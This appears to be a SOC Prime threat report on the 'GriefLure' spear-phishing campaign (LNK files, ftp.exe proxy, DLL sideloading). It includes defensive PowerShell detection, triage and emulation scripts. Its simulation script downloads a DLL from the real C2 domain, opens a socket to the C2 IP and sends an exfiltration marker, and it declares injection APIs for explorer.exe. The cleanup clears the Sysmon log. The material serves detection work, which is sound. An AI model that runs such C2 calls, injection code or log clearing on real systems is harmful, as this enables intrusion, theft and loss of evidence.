SOC Prime Bias: Critical

08 May 2026 18:40

Operation GriefLure: Dissecting an APT Campaign Targeting Vietnam’s Military Telecom & Philippine Healthcare

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Seqrite Labs identified a targeted spear-phishing campaign that relied on malicious Windows LNK files concealed inside double-compressed RAR archives (an archive nested inside another archive). When opened, the LNK used the native Windows ftp.exe binary as a proxy to run a hidden batch script, which reconstructed a polymorphic payload named sfsvc.exe from fragmented .doc files dropped on the victim's machine. The activity was aimed at senior executives within Vietnam's military-owned telecom sector and personnel at a private hospital in the Philippines, using legitimate-looking documents as bait. The full infection chain completed in less than ten seconds and left only minimal artifacts on disk.

Investigation

The investigation broke down the archive structure, mapped the LNK execution path, and reverse-engineered the custom sfsvc.exe loader, which was designed to resemble regsvr32.exe. Analysts documented DLL sideloading, in-memory shellcode execution, process injection, and command-and-control communications through a disguised domain. Artifact review also uncovered a hard-coded C2 domain, www.whatsappcenter.com, hosted through a bulletproof provider in Hong Kong.

Mitigation

Defenders should block execution of LNK files delivered through email attachments and monitor use of native ftp.exe with suspicious command-line arguments. Endpoint detection should focus on fileless DLL loading, alternate data stream writes under C:\Users\Public\Update, and rapid creation of sfsvc.exe. Organizations should also strengthen document provenance checks and educate users about lures that appear to be legitimate legal or whistleblower-related files.
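The detection points in the paragraph above, written out as PowerShell over Sysmon-shaped events. This is an added example, not SOC Prime's rule or Seqrite Labs' code. Field names follow Sysmon's event data (Image, CommandLine, ParentImage, TargetFilename, ImageLoaded, QueryName, DestinationIp); the sample events are constructed rather than captured telemetry, and the ftp.exe -s: switch and the /calldll loader argument are assumed to be the "suspicious command-line arguments" the report alludes to.

```powershell
# Added example (not SOC Prime's or Seqrite's code): GriefLure detection logic over
# Sysmon-shaped events. Each event is a hashtable keyed by Sysmon EventData field names.
function Test-GriefLureEvent {
    param([Parameter(Mandatory)][hashtable]$Event)
    $hits = @()
    $staging = '^C:\\Users\\Public\\Update\\'   # staging folder named in the report
    switch ($Event.Id) {
        1 {   # ProcessCreate
            # ftp.exe driven by a command script (-s:) is the LOLBin proxy step (assumed switch)
            if ($Event.Image -match '\\ftp\.exe$' -and $Event.CommandLine -match '\s-s:') {
                $hits += 'ftp.exe launched with a command script'
            }
            if ($Event.ParentImage -match '\\ftp\.exe$') {
                $hits += "child of ftp.exe: $($Event.Image)"
            }
            if ($Event.CommandLine -match 'copy\s+/b\s+\S+\+\S+') {
                $hits += 'copy /b concatenating fragments'
            }
            if ($Event.Image -match '\\sfsvc\.exe$' -or $Event.CommandLine -match '/calldll') {
                $hits += 'sfsvc.exe loader execution'
            }
        }
        11 {  # FileCreate
            if ($Event.TargetFilename -match $staging) {
                $hits += "file dropped in staging folder: $($Event.TargetFilename)"
            }
        }
        15 {  # FileCreateStreamHash: an alternate data stream was written
            if ($Event.TargetFilename -match ($staging + '.*:')) {
                $hits += "ADS written in staging folder: $($Event.TargetFilename)"
            }
        }
        7 {   # ImageLoad
            if ($Event.Image -match '\\sfsvc\.exe$' -and $Event.ImageLoaded -match '\\360[^\\]*\.dll$') {
                $hits += "sfsvc.exe sideloaded $($Event.ImageLoaded)"
            }
        }
        22 {  # DnsQuery
            if ($Event.QueryName -match 'whatsappcenter\.com$') {
                $hits += "DNS query for C2 domain $($Event.QueryName)"
            }
        }
        3 {   # NetworkConnect
            if ($Event.DestinationIp -eq '38.54.122.188') {
                $hits += "connection to C2 IP from $($Event.Image)"
            }
        }
    }
    return $hits
}

# Convert live Sysmon records into the same hashtable shape (yields nothing where Sysmon is absent).
function Get-SysmonEventHashtable {
    param([int[]]$Id = @(1, 3, 7, 11, 15, 22), [int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = $Id }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = [xml]$_.ToXml()
        $h = @{ Id = $_.Id }
        foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        $h
    }
}

# Constructed sample events (not real telemetry): one per branch plus a benign control.
$samples = @(
    @{ Id = 1;  Image = 'C:\Windows\System32\ftp.exe';  CommandLine = 'ftp -s:C:\Users\Public\Update\c.txt'; ParentImage = 'C:\Windows\explorer.exe' },
    @{ Id = 1;  Image = 'C:\Windows\System32\cmd.exe';  CommandLine = 'cmd /c copy /b a.doc+b.doc sfsvc.exe'; ParentImage = 'C:\Windows\System32\ftp.exe' },
    @{ Id = 11; Image = 'C:\Windows\System32\cmd.exe';  TargetFilename = 'C:\Users\Public\Update\sfsvc.exe' },
    @{ Id = 15; Image = 'C:\Windows\System32\cmd.exe';  TargetFilename = 'C:\Users\Public\Update\a.doc:stage' },
    @{ Id = 7;  Image = 'C:\Users\Public\Update\sfsvc.exe'; ImageLoaded = 'C:\Users\Public\Update\360.dll' },
    @{ Id = 22; Image = 'C:\Users\Public\Update\sfsvc.exe'; QueryName = 'www.whatsappcenter.com' },
    @{ Id = 3;  Image = 'C:\Windows\explorer.exe'; DestinationIp = '38.54.122.188' },
    @{ Id = 1;  Image = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe'; ParentImage = 'C:\Windows\explorer.exe' }
)
foreach ($e in $samples + @(Get-SysmonEventHashtable)) {
    $hits = Test-GriefLureEvent -Event $e
    if ($hits) { "ALERT (Sysmon EID $($e.Id)): $($hits -join '; ')" }
}
```

Every sample except the notepad.exe control produces an alert. The ImageLoad branch is the most specific of the set; the staging-folder and copy /b branches are deliberately broad and belong in a hunt query with an allowlist rather than in a paging alert.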

Response

If the malicious LNK or sfsvc.exe process is detected, isolate the affected endpoint immediately, collect volatile memory, and hunt for 360.*.dll loader files and alternate data stream artifacts. The identified command-and-control domain and related IP address should be blocked, and incident response should begin to determine whether any data was exfiltrated. A broader hunt should also be conducted for similar LNK-driven ftp.exe loader activity across the environment.
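The on-host triage the paragraph above calls for, as an added example that is not SOC Prime's or Seqrite Labs' code. It is read-only: it reports the loader process, 360*.dll files, alternate data streams, a PATH entry for the staging folder, and cached or live network contact with the C2, and it deletes nothing. The staging folder, domain and IP are the ones the report names; that C:\Users\Public\Update is where the DLLs land is an assumption, so the DLL search also walks the user profiles. Run it in an elevated shell.

```powershell
# Added example (not SOC Prime's or Seqrite's code): read-only GriefLure host triage.
$staging  = 'C:\Users\Public\Update'      # staging folder from the report (assumed DLL drop location)
$c2Domain = 'www.whatsappcenter.com'
$c2Ip     = '38.54.122.188'
$findings = [System.Collections.Generic.List[string]]::new()

# 1. Loader process still running
Get-Process -Name sfsvc -ErrorAction SilentlyContinue | ForEach-Object {
    $findings.Add("running process: sfsvc.exe PID $($_.Id) from $($_.Path)")
}

# 2. Sideload DLLs on disk (360.*.dll) under the staging folder and every user profile
Get-ChildItem -Path @($staging, "$env:SystemDrive\Users") -Recurse -Force -Filter '360*.dll' -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("loader DLL: $($_.FullName) ($($_.Length) bytes, written $($_.LastWriteTime))") }

# 3. Alternate data streams on anything in the staging folder (every stream except the main :$DATA)
Get-ChildItem -Path $staging -Recurse -Force -File -ErrorAction SilentlyContinue | ForEach-Object {
    Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object { $findings.Add("ADS: $($_.FileName):$($_.Stream) ($($_.Length) bytes)") }
}

# 4. PATH tampering: staging folder present in the user or machine PATH
foreach ($scope in 'User', 'Machine') {
    $path = [Environment]::GetEnvironmentVariable('Path', $scope)
    if ($path -and ($path -split ';' | Where-Object { $_.TrimEnd('\') -ieq $staging })) {
        $findings.Add("PATH ($scope scope) contains $staging")
    }
}

# 5. Network contact with the C2: resolver cache and live TCP sessions
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $_.Entry -like "*$c2Domain*" -or $_.Data -eq $c2Ip } |
    ForEach-Object { $findings.Add("DNS cache: $($_.Entry) -> $($_.Data)") }
Get-NetTCPConnection -RemoteAddress $c2Ip -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("TCP $($_.State) to ${c2Ip}:$($_.RemotePort) from PID $($_.OwningProcess)") }

# 6. Broader hunt: ftp.exe launched with a command script, if Sysmon (Event ID 1) is present
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents 20000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match '(?m)^Image:.*\\ftp\.exe' -and $_.Message -match '(?m)^CommandLine:.*\s-s:' } |
    ForEach-Object { $findings.Add("Sysmon EID 1: ftp.exe script launch at $($_.TimeCreated)") }

if ($findings.Count) { $findings | ForEach-Object { "[GriefLure] $_" } }
else { 'No GriefLure artifacts found on this host.' }

# Containment, once findings are confirmed (blocks the C2 IP at the host firewall):
# New-NetFirewallRule -DisplayName 'Block GriefLure C2' -Direction Outbound -RemoteAddress $c2Ip -Action Block
```

Collect volatile memory before running anything that changes host state, including the firewall rule; the triage itself only reads.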

Attack Flow

  1. Initial access (T1566.001 Spearphishing Attachment): the victim receives a double-compressed RAR archive containing a legitimate-looking legal document and a malicious LNK file.
  2. Malicious LNK: carries a double extension (e.g., document.lnk.rar) to evade detection; opening it invokes ftp.exe.
  3. ftp.exe (Windows system binary): used as a proxy to launch the hidden batch script.
  4. Batch script: runs copy /b to reassemble the payload fragments into sfsvc.exe and 360.dll.
  5. sfsvc.exe: final payload executable created from the document fragments.
  6. 360.dll: polymorphic DLL used for sideloading and shellcode delivery.
  7. PATH modification (T1574.007 Path Interception by PATH Environment Variable): sfsvc.exe adds C:\Users\Public\Update to PATH for persistence, which is what lets the sideload resolve.
  8. DLL sideloading (T1574.002 DLL Side-Loading, with T1546.009 AppCert DLLs): sfsvc.exe loads 360.dll via /calldll and DllRegisterServer.
  9. Process injection (T1055.001 Dynamic-link Library Injection): 360.dll injects second-stage shellcode into explorer.exe.
  10. Discovery (T1057 Process Discovery, T1518.001 Security Software Discovery): enumerates running processes and installed security products.
  11. Credential access (T1555.003 Credentials from Web Browsers, T1552.001 Credentials In Files): harvests saved passwords, cookies and configuration files.
  12. Collection (T1113 Screen Capture, T1083 File and Directory Discovery): collects screenshots and directory listings for exfiltration.
  13. Exfiltration (T1071.001 Web Protocols, T1573 Encrypted Channel): data is sent to the C2 server over XOR-encoded HTTPS.
  14. C2 server www.whatsappcenter.com receives the exfiltrated data.
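The ftp.exe to batch script to copy /b reassembly steps of the attack flow, as an added benign emulation for generating the corresponding telemetry on a test host. This is not Seqrite Labs' or SOC Prime's code. It assumes ftp.exe was driven with its -s: command-script switch and the "!" shell escape, which the report does not spell out; the fragment contents and the names part1..3.doc, run.bat and cmds.txt are constructed. Nothing reassembled is executed, PATH is changed only inside the batch process (the campaign's persistent PATH change is not emulated), and the staging folder is removed at the end. Run only on an isolated test host.

```powershell
# Added example (not Seqrite's or SOC Prime's code): benign emulation of the
# ftp.exe -> cmd.exe -> copy /b reassembly chain. Assumes ftp.exe's -s: switch and
# "!" shell escape were the proxy mechanism. Do not run outside an isolated lab.
$stage = 'C:\Users\Public\Update'              # staging folder named in the report
New-Item -ItemType Directory -Path $stage -Force | Out-Null

# Constructed "document" fragments standing in for the campaign's fragmented .doc files
$fragments = @('GRIEFLURE-', 'EMULATION-', 'FRAGMENT')
for ($i = 0; $i -lt $fragments.Count; $i++) {
    [IO.File]::WriteAllBytes("$stage\part$($i + 1).doc", [Text.Encoding]::ASCII.GetBytes($fragments[$i]))
}

# Batch script: prepend the staging folder to the (process-scope) PATH, then rebuild
# sfsvc.exe and 360.dll from the fragments with copy /b. Neither output is executed.
$batch = @"
@echo off
set PATH=$stage;%PATH%
copy /b "$stage\part1.doc"+"$stage\part2.doc"+"$stage\part3.doc" "$stage\sfsvc.exe" >nul
copy /b "$stage\part3.doc"+"$stage\part2.doc" "$stage\360.dll" >nul
"@
Set-Content -Path "$stage\run.bat" -Value $batch -Encoding ASCII

# ftp.exe command script: a leading "!" hands the rest of the line to cmd.exe; "quit" ends the session
Set-Content -Path "$stage\cmds.txt" -Value "!cmd.exe /c $stage\run.bat`r`nquit`r`n" -Encoding ASCII -NoNewline

# This is the process tree a detection should catch: ftp.exe -s:<script> -> cmd.exe -> copy
Start-Process -FilePath "$env:SystemRoot\System32\ftp.exe" -ArgumentList "-s:$stage\cmds.txt" -Wait -NoNewWindow

# Confirm the reassembly produced the expected bytes (read, never run)
$rebuilt = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes("$stage\sfsvc.exe"))
"Reassembled sfsvc.exe contains: $rebuilt"     # GRIEFLURE-EMULATION-FRAGMENT

# Cleanup: remove every staged artifact
Remove-Item -Path $stage -Recurse -Force
```

With Sysmon running, the chain shows up as Event ID 1 for ftp.exe with -s: on its command line, a cmd.exe child of ftp.exe, and Event ID 11 file creations for sfsvc.exe and 360.dll under C:\Users\Public\Update; the emulation has no network step and does not touch the registry.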

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker, having gained an initial foothold via a phishing attachment (T1566.001, T1204.002), relies on built-in tooling rather than dropping a custom executable. From cmd.exe (T1059.003) they launch a PowerShell one-liner that performs the following steps:

    1. Discovery – enumerate system information (T1082) and running processes (T1057) to choose an injection target.
    2. Credential Harvesting – read browser stores (T1555.003) and copy credential files (T1552.001) to a staging folder.
    3. Payload Retrieval – download a malicious DLL from the C2 domain www.whatsappcenter.com over HTTPS (T1071.001, T1105).
    4. Process Injection – inject the DLL into explorer.exe (T1055.001) so the implant runs under a trusted, long-lived process.
    5. C2 Communication – open a persistent TCP connection to 38.54.122.188 (the hard-coded IP) and begin exfiltrating the harvested data (T1041).

    The simulation collapses the real ftp.exe/sfsvc.exe chain into a single PowerShell script; the step that satisfies the Sigma rule is the outbound connection attempt to the exact domain/IP, which Sysmon records as a DNS query (Event ID 22) and a network connection (Event ID 3). The Windows Firewall records it only if connection logging is enabled.

  • Regression Test Script:

    # -------------------------------------------------
    # GriefLure C2 simulation – PowerShell version
    # Run only on an isolated test host with egress to the C2 blocked at the
    # perimeter: the goal is the Sysmon DNS (EID 22) and network (EID 3)
    # telemetry, not a successful download or connection.
    # -------------------------------------------------
    # 1. System discovery (T1082, T1057)
    Get-CimInstance -ClassName Win32_OperatingSystem | Out-Null
    Get-Process | Select-Object -First 5 | Out-Null
    
    # 2. Simulate credential harvesting (T1555.003, T1552.001)
    $credStaging = Join-Path $env:TEMP 'creds.txt'
    "username=admin`npassword=P@ssw0rd!" | Set-Content -Path $credStaging
    
    # 3. Attempt to download a DLL from the hard-coded C2 domain (T1071.001, T1105).
    #    The request is expected to fail in the lab; the DNS lookup and the
    #    connection attempt are the telemetry the rule keys on.
    $c2Domain = "www.whatsappcenter.com"
    $c2Url = "https://$c2Domain/payload.dll"
    $dllPath = Join-Path $env:TEMP 'payload.dll'
    try {
        Invoke-WebRequest -Uri $c2Url -OutFile $dllPath -UseBasicParsing -TimeoutSec 10
    } catch {
        Write-Warning "C2 download failed as expected: $($_.Exception.Message)"
    }
    
    # 4. Process access to explorer.exe (T1055.001). Opening a handle with
    #    PROCESS_ALL_ACCESS is enough to produce Sysmon EID 10 (ProcessAccess);
    #    no memory is written and no remote thread is created.
    $target = (Get-Process -Name explorer | Select-Object -First 1).Id
    $inject = @"
    using System;
    using System.Runtime.InteropServices;
    public class Injector {
        [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
        [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll")] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll", SetLastError=true)] public static extern bool CloseHandle(IntPtr hObject);
    }
    "@
    Add-Type -TypeDefinition $inject
    $hProc = [Injector]::OpenProcess(0x1F0FFF, $false, $target)   # PROCESS_ALL_ACCESS
    if ($hProc -ne [IntPtr]::Zero) { [Injector]::CloseHandle($hProc) | Out-Null }
    # VirtualAllocEx / WriteProcessMemory / CreateRemoteThread are declared but
    # deliberately never called: this test must not modify explorer.exe.
    
    # 5. Open a C2 socket to the hard-coded IP (T1041). The connect attempt is
    #    what generates Sysmon EID 3; a refused or timed-out connection is fine.
    $c2Ip = "38.54.122.188"
    $port = 443
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $client.Connect($c2Ip, $port)
        $stream = $client.GetStream()
        $payload = [System.Text.Encoding]::UTF8.GetBytes("EXFIL_START")
        $stream.Write($payload, 0, $payload.Length)
        Start-Sleep -Seconds 5
        $stream.Close()
    } catch {
        Write-Warning "C2 connect failed as expected: $($_.Exception.Message)"
    } finally {
        $client.Close()
    }
  • Cleanup Commands:

    # Remove staged files
    Remove-Item -Path (Join-Path $env:TEMP 'creds.txt') -Force -ErrorAction SilentlyContinue
    Remove-Item -Path (Join-Path $env:TEMP 'payload.dll') -Force -ErrorAction SilentlyContinue
    
    # Close any lingering TCP connections to the C2 IP. The socket above is already
    # closed, so this is a safety net; never terminate the shell running the cleanup.
    Get-NetTCPConnection -RemoteAddress 38.54.122.188 -ErrorAction SilentlyContinue |
      Where-Object { $_.OwningProcess -ne $PID } |
      ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }
    
    # Optionally clear the Sysmon operational log for a clean state in repeated tests
    # (requires an elevated shell). Reloading the Sysmon configuration only applies
    # the config; it does not discard events already written.
    wevtutil cl Microsoft-Windows-Sysmon/Operational
    & "$env:ProgramFiles\Sysinternals\Sysmon.exe" -c sysmon-config.xml